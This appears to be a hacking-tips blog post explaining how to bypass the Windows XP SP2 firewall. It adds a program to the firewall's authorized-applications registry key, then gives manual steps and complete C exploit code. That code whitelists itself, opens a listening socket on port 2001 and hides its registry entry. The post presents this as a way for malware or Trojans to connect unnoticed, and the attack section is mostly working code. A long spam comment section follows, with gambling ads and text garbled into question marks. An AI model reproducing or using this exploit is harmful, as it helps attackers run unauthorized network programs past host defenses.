How to Bypassing Windows-XP Firewall

Posted on by Aneesh Kansal | 10372 Views | 11 min read

There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall’s registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip

Vulnerable Systems :-
* Microsoft Windows XP SP2

Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.

If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit :-

#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include “Shlwapi.h”int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;

GetModuleFileName(NULL, filename, 1024);

strcpy(buffer, filename);
strcat(buffer, “:*:Enabled:”);
strcat(buffer, “bugg”);

RegOpenKeyEx(

HKEY_LOCAL_MACHINE,
“SYSTEM\\CurrentControlSet\\Services” “\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile” “\\AuthorizedApplications\\List”,
0,
KEY_ALL_ACCESS,
&hKey);

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;

fprintf(stdout, “Simple server example with Anti SP2 firewall trick \n”);
fprintf(stdout, ” This is not trojan \n”);
fprintf(stdout, ” Opened port is :2001 \n”);
fprintf(stdout, “author:Mark Kica student of Technical University Kosice\n”);
fprintf(stdout, “Dedicated to Katka H. from Levoca \n”);

sleep(3);

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror(“accept”);
continue;
}
temp = send(new_fd, “Hello World\r\n”, strlen(“Hello World\r\n”), 0);
fprintf(stdout, “Sended: Hello World\r\n”);
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = ‘\0’;
fprintf(stdout, “Recieved: %s\r\n”, buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

if (!strcmp(buffer, “quit”))
break;
}

ezsocket_exit();
return 0;
}

/* EoF */

You may also like

Hacking Tricks
4 min read

How To Recover Forgotten Android Security Lock Pattern?

Hacking Tricks
16 min read

How to Increase Utorrent Download Speed?

Hacking Tricks
1 min read

Subway Surfer Hacked Version

164 thoughts on “How to Bypassing Windows-XP Firewall

  1. ??? ???????????, ??? ????? ?????????? ?????????? ? ???? ??????. ? ????????, ??? ???? ????? ????????????? ? ?????? ???? ????????? ??????? ????????? ? ?????????? ????????. ?????????? ?????????? ?? ??? ?????????!

    Reply

  3. ? ???????? ???? ???????! ??? ?? ?????? ????????????? ??????????, ?? ? ???????? ? ???? ????????????? ??????. ????? ????? ??????? ???? ??????? ? ???????????, ??? ?????? ??? ?????? ???????? ????????????.

    Reply

  6. I blog often and I really appreciate your content. Your article has really peaked my interest. I will take a note of your site and keep checking for new information about once a week. I opted in for your Feed as well.

    Reply

  19. I like the valuable information you provide in your articles. I will bookmark your blog and check again here regularly. I’m quite certain I will learn many new stuff right here! Good luck for the next!

    Reply

  20. Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point. You clearly know what youre talking about, why throw away your intelligence on just posting videos to your weblog when you could be giving us something informative to read?

    Reply

  21. ? ????? ?? ??????????? ???????? ? ?????????????????? ????????? ? ???? ??????. ????? ????? ?????????? ?????????? ? ???????? ? ???????? ???????, ??? ??????? ??? ????? ??????? ????????. ????? ?????? ??????!

    Reply

  22. hello there and thank you for your info – I have definitely picked up something new from right here. I did however expertise some technical issues using this web site, since I experienced to reload the web site a lot of times previous to I could get it to load properly. I had been wondering if your web hosting is OK? Not that I’m complaining, but sluggish loading instances times will sometimes affect your placement in google and can damage your high-quality score if ads and marketing with Adwords. Well I’m adding this RSS to my e-mail and could look out for much more of your respective fascinating content. Make sure you update this again very soon.

    Reply

  24. Superb site you have here but I was wanting to know if you knew of any forums that cover the same topics talked about in this article? I’d really like to be a part of group where I can get suggestions from other experienced individuals that share the same interest. If you have any suggestions, please let me know. Kudos!

    Reply

  27. ? ???? ????????????? ?????? ???? ??????. ??? ????????????? ?????????? ?????? ? ?????? ??? ??????? ????????? ????????. ???????? ?? ??????? ?????? ?????? ?? ???????????? ? ????????? ??????????.

    Reply

  29. With havin so much content and articles do you ever run into any issues of plagorism or copyright violation? My blog has a lot of completely unique content I’ve either authored myself or outsourced but it looks like a lot of it is popping it up all over the web without my authorization. Do you know any ways to help prevent content from being stolen? I’d genuinely appreciate it.

    Reply

  31. ? ????? ?? ???????? ???? ????????????? ?????? ???? ?????? ?? ????????????? ??????????, ??????? ?? ???????????. ? ????? ?????? ?? ?????? ???? ??????? ? ??????? ????? ??????. ??? ????????????? ?????? ??????!

    Reply

  37. Yo, 69betwin! Just wanted to say this site is legit. Easy to navigate, and the games are actually pretty sweet. Had a decent winning streak last week. Check it out for yourself: 69betwin

    Reply

  45. Hi it’s me, I am also visiting this web page daily, this web site is genuinely fastidious and the viewers are genuinely sharing pleasant thoughts.

    Reply

  46. ??? ?????? – ????????? ???????! ??? ?? ?????? ???????? ???????? ??????????, ?? ? ???????????? ? ??????? ? ???????? ?????????. ? ?????????? ?????? ?? ??? ?????? ? ???????? ?????? ??????????? ? ????????? ?????????.

    Reply

  48. ? ?????? ??? ???????? ??? ??????, ? ??? ????????????? ???????????, ??? ??? ????????. ????? ??????????? ??????? ? ???????? ????, ???????? ?? ????, ? ?????????? ?????????? ? ??????? ????????. ????? ????????????!

    Reply

  56. ? ????? ?? ??????????? ???????? ? ?????????????????? ????????? ? ???? ??????. ????? ????? ?????????? ?????????? ? ???????? ? ???????? ???????, ??? ??????? ??? ????? ??????? ????????. ????? ?????? ??????!

    Reply

  61. Greetings from Colorado! I’m bored to tears at work so I decided to check out your blog on my iphone during lunch break. I love the knowledge you provide here and can’t wait to take a look when I get home. I’m shocked at how fast your blog loaded on my phone .. I’m not even using WIFI, just 3G .. Anyways, fantastic blog!

    Reply

  62. ??? ?????? ???????? ????????? ?????????? ??????????? ? ?????????. ??? ?? ?????? ????????????? ??????????, ?? ? ??????????? ? ??????????? ???????? ????. ??????? ??????? ?????? ?? ??? ???????? ? ???????? ?????? ????????????? ????????!

    Reply

  67. Its such as you read my mind! You appear to grasp so much approximately this, such as you wrote the guide in it or something. I think that you just could do with a few p.c. to force the message house a little bit, but other than that, this is excellent blog. A fantastic read. I will certainly be back.

    Reply

  71. Thanks for some other excellent article. Where else may anybody get that kind of info in such a perfect approach of writing? I’ve a presentation subsequent week, and I am on the search for such information.

    Reply

  80. ?????? ???????????? ?????????? ????? ??????????? ???????????? ? ????????? ????? ?????? ?? ?????? ????????. ??? ????????????? ??????? ????????? ????? ??? ???, ??? ????? ??????? ???? ????? ????????.

    Reply

  83. VG99 h?? Th?y qu?ng cáo r?m r? l?m ?ó. ?? vào xem có ?úng là ‘ngon’ nh? l?i ??n không ?ã. Bi?t ?âu l?i tìm ???c b?n ?? m?i. Let’s explore vg99.

    Reply

  84. Hi there everybody, here every person is sharing such know-how, thus it’s fastidious to read this weblog, and I used to visit this weblog all the time.

    Reply

  86. ? ?????? ??? ???????? ??? ??????, ? ??? ????????????? ???????????, ??? ??? ????????. ????? ??????????? ??????? ? ???????? ????, ???????? ?? ????, ? ?????????? ?????????? ? ??????? ????????. ????? ????????????!

    Reply

  90. Hi there would you mind letting me know which hosting company you’re using? I’ve loaded your blog in 3 completely different internet browsers and I must say this blog loads a lot faster then most. Can you suggest a good web hosting provider at a honest price? Thanks, I appreciate it!

    Reply

  91. Thank you for some other informative web site. Where else could I get that kind of information written in such an ideal manner? I’ve a undertaking that I’m just now working on, and I’ve been on the glance out for such info.

    Reply

  92. Hi, I do believe this is a great site. I stumbledupon it 😉 I am going to come back once again since I bookmarked it. Money and freedom is the greatest way to change, may you be rich and continue to guide others.

    Reply

  95. ? ????? ?? ???????? ???? ????????????? ?????? ???? ?????? ?? ????????????? ??????????, ??????? ?? ???????????. ? ????? ?????? ?? ?????? ???? ??????? ? ??????? ????? ??????. ??? ????????????? ?????? ??????!

    Reply

  97. Hi, i read your blog occasionally and i own a similar one and i was just curious if you get a lot of spam remarks? If so how do you protect against it, any plugin or anything you can advise? I get so much lately it’s driving me mad so any assistance is very much appreciated.

    Reply

  106. ? ???? ????????????? ?????? ???? ??????. ??? ????????????? ?????????? ?????? ? ?????? ??? ??????? ????????? ????????. ???????? ?? ??????? ?????? ?????? ?? ???????????? ? ????????? ??????????.

    Reply

  107. ? ????? ?? ???????? ???? ?????????????? ???? ???????! ??? ?? ?????? ????????????, ?? ? ??????????? ???? ?? ?????????? ???????? ????. ????? ????? ???????? ???? ??????? ? ??????, ??? ?????? ??? ?????? ???????? ??????????.

    Reply

  108. Thank you, I’ve just been searching for information approximately this topic for ages and yours is the best I’ve came upon so far. However, what in regards to the conclusion? Are you sure in regards to the source?

    Reply

  109. We are a group of volunteers and opening a new scheme in our community. Your web site provided us with valuable information to work on. You’ve done an impressive job and our entire community will be grateful to you.

    Reply

  110. My partner and I stumbled over here coming from a different website and thought I might as well check things out. I like what I see so i am just following you. Look forward to exploring your web page for a second time.

    Reply

  113. **mitolyn reviews**

    Mitolyn is a carefully developed, plant-based formula created to help support metabolic efficiency and encourage healthy, lasting weight management.

    Reply

  120. Today, I went to the beach with my children. I found a sea shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She put the shell to her ear and screamed. There was a hermit crab inside and it pinched her ear. She never wants to go back! LoL I know this is totally off topic but I had to tell someone!

    Reply

  121. An impressive share! I have just forwarded this onto a colleague who was conducting a little homework on this. And he in fact bought me breakfast because I found it for him… lol. So allow me to reword this…. Thanks for the meal!! But yeah, thanx for spending time to discuss this issue here on your site.

    Reply

  122. fantastic submit, very informative. I’m wondering why the opposite specialists of this sector don’t notice this. You should proceed your writing. I am confident, you’ve a great readers’ base already!

    Reply

  124. Great post. I was checking continuously this blog and I am impressed! Very useful info particularly the last part 🙂 I care for such information much. I was looking for this certain info for a long time. Thank you and best of luck.|

    Reply

  125. You can certainly see your enthusiasm within the article you write. The world hopes for even more passionate writers like you who aren’t afraid to say how they believe. Always go after your heart.

    Reply

  127. ? ????????? ???? ???????! ??? ?? ?????? ????????????, ?? ? ?????????????. ??? ?????????? ?????? ?????? ? ?????????? ????, ? ? ????? ????? ??????. ???????? ??????? ?? ????? ?????????? ? ???????? ??????!

    Reply

  130. You really make it appear so easy together with your presentation however I find this matter to be really something which I feel I’d never understand. It sort of feels too complicated and extremely extensive for me. I’m taking a look forward to your subsequent put up, I’ll attempt to get the dangle of it!

    Reply

  134. Woah! I’m really loving the template/theme of this website. It’s simple, yet effective. A lot of times it’s tough to get that “perfect balance” between superb usability and visual appearance. I must say that you’ve done a superb job with this. Additionally, the blog loads super fast for me on Opera. Superb Blog!

    Reply

  135. ? ???????? ???????? ????????????, ??????? ????? ?????? ??? ???? ??????. ??? ?????????? ?????? ? ?????? ? ??????? ??????????, ??? ?? ????????? ??????? ? ????? ???????. ??????? ??????? ?? ????? ???????????? ??????!

    Reply

  138. ??? ?????? – ???????? ?????? ??????????! ? ???????? ??????? ???????????? ? ???????????? ??????????????? ????????. ??? ????????????? ????????? ??? ?????? ? ??????? ??? ????? ?????? ????. ??????? ??????? ?????? ?? ????? ???????????? ??????!

    Reply

  141. My family all the time say that I am killing my time here at net, however I know I am getting familiarity everyday by reading thes nice articles or reviews.

    Reply

  142. ? ???? ???????????? ?????? ? ???????? ????????. ?? ?????????? ???????? ?????????? ?????????? ? ????????? ??? ???????????? ???????????? ??????, ?? ?????? ???????????? ????? ??????.

    Reply

  146. Heya i am for the first time here. I found this board and I to find It really helpful & it helped me out a lot. I am hoping to offer one thing back and help others such as you aided me.

    Reply

  149. It’s truly a nice and helpful piece of information. I’m satisfied that you just shared this useful information with us. Please keep us informed like this. Thank you for sharing.

    Reply

  150. I’m not sure exactly why but this web site is loading very slow for me. Is anyone else having this problem or is it a problem on my end? I’ll check back later and see if the problem still exists.

    Reply

  154. Hello there, You have done a fantastic job. I will definitely digg it and personally suggest to my friends. I’m confident they’ll be benefited from this website.

    Reply

  155. What i do not realize is actually how you’re not actually a lot more neatly-favored than you may be now. You are very intelligent. You know therefore considerably when it comes to this subject, made me individually believe it from so many numerous angles. Its like men and women don’t seem to be interested until it is something to accomplish with Lady gaga! Your personal stuffs outstanding. At all times take care of it up!

    Reply

  161. ? ????????, ??? ??? ?????? ???????? ????????? ?????????? ???????????. ??? ?????????? ????? ???? ? ???????? ??????? ?????? ??????. ??????? ??????? ?????? ?? ??? ?????????? ? ????????????? ??????!

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *

Popular News

8 Rules to Stay Productive When You Work for Yourself
Business . Business Choice . Lifestyle
21 min read

8 Rules to Stay Productive When You Work for Yourself

5 Ways to Boost Your Small-Business Marketing
Business . Business Growth . Small Business
20 min read

5 Ways to Boost Your Small-Business Marketing

7 Ways to Think Like an Entrepreneur in Your Career
Business . Entrepreneur
20 min read

7 Ways to Think Like an Entrepreneur in Your Career

Featured News

20 Characteristics of Effective Entrepreneurs
Business . Entrepreneur
28 min read

20 Characteristics of Effective Entrepreneurs

3 Benefits of Gratitude that Can Change Your Life
Lifestyle
11 min read

3 Benefits of Gratitude that Can Change Your Life

Top 5 Ways to Start Your Day with Positivity
Business Choice . Lifestyle
11 min read

Top 5 Ways to Start Your Day with Positivity

5 Things You Should Know Before Working for a Start-Up
Business . Business Growth . Enterprise . Entrepreneur . Small Business
11 min read

5 Things You Should Know Before Working for a Start-Up

how-to-start-a-small-business-in-7-steps
Business . Small Business
20 min read

How to Start a Small Business in 7 Steps?

Trending News

5 Ways to Boost Your Small-Business Marketing
Business . Business Growth . Small Business
20 min read

5 Ways to Boost Your Small-Business Marketing

4 Tactics to Manage your Time
Lifestyle
12 min read

4 Tactics to Manage your Time

10-important-questions-that-will-push-your-business-growth
Business . Business Growth . Latest
32 min read

10 Important Questions That Will Push Your Business Growth